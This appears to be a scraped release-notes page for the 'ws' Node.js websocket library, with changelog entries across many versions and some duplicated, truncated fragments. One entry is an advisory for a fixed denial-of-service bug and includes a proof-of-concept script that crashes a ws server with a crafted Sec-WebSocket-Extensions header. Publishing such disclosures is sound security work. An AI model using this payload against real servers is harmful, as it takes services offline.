NewYour coding agent can read the release notes before it upgrades.Set up the MCP server →
npm · #55 most downloaded on npm
Simple to use, blazing fast and thoroughly tested websocket client and server for Node.js
Last release 2 days ago
26 Sep 2026
Release timing varies
gaps range from 1 weeks to 8 months
Nearly every release is documented
notes for 60 of the last 60 stable releases
Nothing withdrawn
no release was ever pulled
15 years old
189 releases · first in 2011
Added a workaround for a double 'error' event bug in Node.js < 13 which caused an uncaught error during the WebSocket handshake (38d6ab3b).
'error' event bug in Node.js < 13 which
caused an uncaught error during the WebSocket handshake (38d6ab3b).The callback of WebSocketServer.prototype.handleUpgrade() now takes the client HTTP GET request as second argument (7d39f19e).
WebSocketServer.prototype.handleUpgrade() now takes the
client HTTP GET request as second argument (7d39f19e).CONNECTING, OPEN, CLOSING, CLOSED, binaryType, bufferedAmount,
extensions, onclose, onerror, onmessage, onopen, protocol,
readyState, and url properties are now enumerable (2069e684).One column per quarter.
Improved websocket.bufferedAmount accuracy (e1349c04, a1629426).
websocket.bufferedAmount accuracy (e1349c04, a1629426).WebSocket.prototype.addEventListener() now supports the once option (#1754).
WebSocket.prototype.addEventListener() now supports the once option (#1754).Fixed compatibility with Node.js master (651d6627).
WebSocket#{p{i,o}ng,close}() now thow an error if the data to send is too large to fit in a control frame (e54f08da).
WebSocket#{p{i,o}ng,close}() now thow an error if the data to send is too
large to fit in a control frame (e54f08da).Fixed an issue where calling webSocketStream.end() could cause the process to crash (9535702e).
webSocketStream.end() could cause the process
to crash (9535702e).Added bufferutil and utf-8-validate as peer dependencies (#1626).
bufferutil and utf-8-validate as peer dependencies (#1626).Added ability to specify the readableObjectMode option when using WebSocket.createWebSocketStream() (#1647).
readableObjectMode option when using
WebSocket.createWebSocketStream() (#1647).Fixed a bug that caused compress jobs to never be marked as complete (#1618).
An error is now thrown if the WebSocket server constructor is used incorrectly (36412662).
WebSocket server constructor is used
incorrectly (36412662).Added utility to wrap a WebSocket in a Duplex stream (#1589).
WebSocket in a Duplex stream (#1589).if statement" (dbacf582, #1591).Added ability to disable sending the SNI extension (#1587).
Dropped support for Node.js 6 (1e6999bb).
url.Url instances in the WebSocket constructor
(692d7b47).WebSocket#{p{i,o}ng,send}() has changed when the
readyState attribute is not OPEN (#1532)
CONNECTING, an exception is thrown.CLOSING or CLOSED
bufferedAmount attribute is increased by the length of the data
argument in bytes.callback function is called with an error.callback function is not provided.Fixed a bug introduced in version 6.2.5 that prevented the fragment counter from resetting ( 899bf9e ).
Backported a2f4e7c and f197ac6 to the v6.x release line ( 58ddc8c , 4f19c0c ).
Backported 2b2abd45 to the 6.x release line (a76e2111).
Backported e55e5106 to the 6.x release line (eeb76d31).
Backported 00c425ec to the 6.x release line (78c676d2).
Fixed a bug that, under certain circumstances, prevented the close timer from being set (aa1dcd5).
Added ability to follow redirects (#1490).
Sec-WebSocket-Key header field
value is invalid (160af45b).Fixed an issue that caused the Host header to always include a port (#1510).
Host header to always include a port (#1510).Fixed a bug that, under certain circumstances, prevented the close frame from being parsed (#1494).
Restored compatibility with Node.js < 6.13.0 (26436e0).
Queued messages to send are now discarded if the permessage-deflate is enabled and the socket closes prematurely (#1464, #1471).
The WebSocket server now emits a 'close' event when the server closes (#1453).
'close' event when the server
closes (#1453).Dropped support for Node.js 4 (d73885c).
maxPayload option on the client. Defaults to 100 MiB (#1402).memLevel and level options. Use
zlibDeflateOptions instead. (80e2002).Fixed a bug introduced in version 5.2.6 that prevented the fragment counter from resetting ( 504a6ef ).
Backported a2f4e7c and f197ac6 to the v5.x release line ( 6019b4e , 55260e5 ).
Backported 2b2abd45 to the 5.x release line (bd8756a4).
Backported e55e5106 to the 5.x release line (4abd8f6d).
Backported 00c425ec to the 5.x release line (76d47c14).
Fixed a use after invalidation bug introduced in 6046a28 (8aba871).
Fixed a bug that could prevent buffered data from being processed under certain circumstances (6046a28).
Added ability to specify custom headers when rejecting the handshake (#1379).
Fixed a regression introduced in 9e152f9 (#1347).
The address argument of the WebSocket constructor can now be a [URL][] instance (#1329).
address argument of the WebSocket constructor can now be a URL
instance (#1329).options argument of the WebSocket constructor now accepts any TLS
option that is also accepted by https.request() (#1332).Dropped support for Node.js < 4.5.0 (#1313).
net.Socket errors are no longer re-emitted (a4050db).Added WebSocketServer.prototype.address() (#1294).
WebSocketServer.prototype.address() (#1294).zlib{Deflate,Inflate}Options options (#1306).The close status code is now set to 1005 if the received close frame contains no status code (a31b1f6).
onerror event handler now receives an ErrorEvent instead of JavaScript
error (63e275e).WebSocket.prototype.ping() and
WebSocket.prototype.pong() is no longer a boolean but an optional callback
(30c9f71).protocolVersion and bytesReceived attributes have been
removed (30c9f71...ee9b5f3).extensions attribute is no longer an object but a string representing
the extensions selected by the server (fdec524).'headers' event on the client has been renamed to 'upgrade'. Listeners
of this event now receive only the response argument (1c783c2).WebSocket.prototype.pause() and WebSocket.prototype.resume() methods
have been removed to prevent the user from interfering with the state of the
underlying net.Socket stream (a206e98).net.Socket errors are no longer swallowed (beff620).
net.Socket errors are no longer swallowed (beff620).The parser of the Sec-WebSocket-Extensions header has been rewritten to make it spec-compliant (#1240).
Sec-WebSocket-Extensions header has been rewritten to make
it spec-compliant (#1240).Fixed a DoS vulnerability (c4fe466).
A specially crafted value of the Sec-WebSocket-Extensions header that
used Object.prototype property names as extension or parameter names
could be used to make a ws server crash.
const WebSocket = require('ws');
const net = require('net');
const wss = new WebSocket.Server({ port: 3000 }, function () {
const payload = 'constructor'; // or ',;constructor'
const request = [
'GET / HTTP/1.1',
'Connection: Upgrade',
'Sec-WebSocket-Key: test',
'Sec-WebSocket-Version: 8',
`Sec-WebSocket-Extensions: ${payload}`,
'Upgrade: websocket',
'\r\n'
].join('\r\n');
const socket = net.connect(3000, function () {
socket.resume();
socket.write(request);
});
});
The vulnerability has been privately reported by Nick Starke and Ryan Knell of Sonatype Security Research and promptly fixed. Please update now!
Added ecdhCurve option (#1228).
ecdhCurve option (#1228).Added ability to specify the compression level (#1199).
Added ability to specify the handshake request timeout (#1177).
CloseEvent#wasClean was incorrectly set to false for
close codes in the 3000-4999 range (#1146).Removed the upgradeReq property (#1099).
upgradeReq property (#1099).flags argument from the 'message', 'ping', and 'pong'
events (#1101).Fixed an issue that prevented WebSocket.prototype.close() from working properly when called from a listener of the headers event (732aaf0).
WebSocket.prototype.close() from working
properly when called from a listener of the headers event (732aaf0).All hooks have now access to the upgrade request (#1070).
WebSocket client now emits a headers event (#1082).Added support for Node.js 4.1.0 - 4.4.7 (#1059).
options argument to be reassigned when
protocols was null (20bd7c7).Fixed a linter issue that prevented tests from running on CITGM (#1050).
WebSocket.prototype.terminate() now closes the connection immediately even if the other peer fails to work properly (#1033).
WebSocket.prototype.terminate() now closes the connection immediately even
if the other peer fails to work properly (#1033).Added "fragments" as possible value for the binaryType attribute (#1018).
binaryType attribute (#1018).Added ability to specify URL path with UNIX domain socket URLs (060b275).
Fixed an issue that caused a stack overflow when parsing a buffer with thousands of frames (#992).
Added support for bufferutil@2 and utf-8-validate@3 (466e210).
bufferutil@2 and utf-8-validate@3 (466e210).Fixed a bug that caused wrong frames to be created (d856dcb).
The following breaking changes only apply if you required the mentioned classes directly.
new operator is now required to create all instances as we moved to ES6
classes.clients property of the WebSocketServer is no longer an Array but a
Set and is only set if the clientTracking option is truthy (#806).WebSocketServers
when binding them to the same underlying HTTP/s server (#885).WebSocket.prototype.stream() and ability to pass a readable stream
to WebSocket.prototype.send() (#875).handleProtocols handler (#890).supports property from WebSocket (#918).WebSocket.createServer(), WebSocket.createConnection(), and
WebSocket.connect() factory functions (#926).WebSocket.prototype.ping() and
WebSocket.prototype.pong() is no longer an options object but a boolean
(#951).WebSocket.prototype.close() is called before the
connection is established (#956).The following breaking changes only apply if you required the mentioned classes directly.
Sender inheritance from EventEmitter (#861).BufferPool class (73ab370).extensions a required argument for the Receiver constructor (5f53194).receiver.onbinary and receiver.ontext have been merged into
receiver.onmessage (#939).WebSocketServer (#795).checkServerIdentity option to WebSocket (#701).threshold option for permessage-deflate to only compress messages
whose size is bigger than threshold (6b3904b).shouldHandle method to WebSocketServer to see if a request should
be accepted or rejected. This method can be overridden by the user if a
custom logic is desired (6472425).removeEventListener method to WebSocket (078e96a).family option to WebSocket (#962).error events are now emitted with a proper Error instance (#789).fin option of WebSocket.prototype.send() was
unconditionally set to true (ea50be7).zlib.flush() was called with a wrong flush level
(#733).WebSocketServer.prototype.close() is now invoked when the
close event is emitted by the underlying HTTP/s server (#892).connection event was emitted even if the client
closed the connection during the handshake process (04530ad).crypto.randomBytes() instead of
Math.random() (7253f06).clients
set (#955).WebSocket.prototype.close() now works as expected if called on the client
before the connection is established (#956).WebSocket.prototype.send() no longer mutates the options object (#968).bufferedAmount getter now takes into account the data queued in the
sender (#971).Nothing published for this version
Nothing published for this version
Your coding agent can read these notes before it upgrades. Set up the MCP server →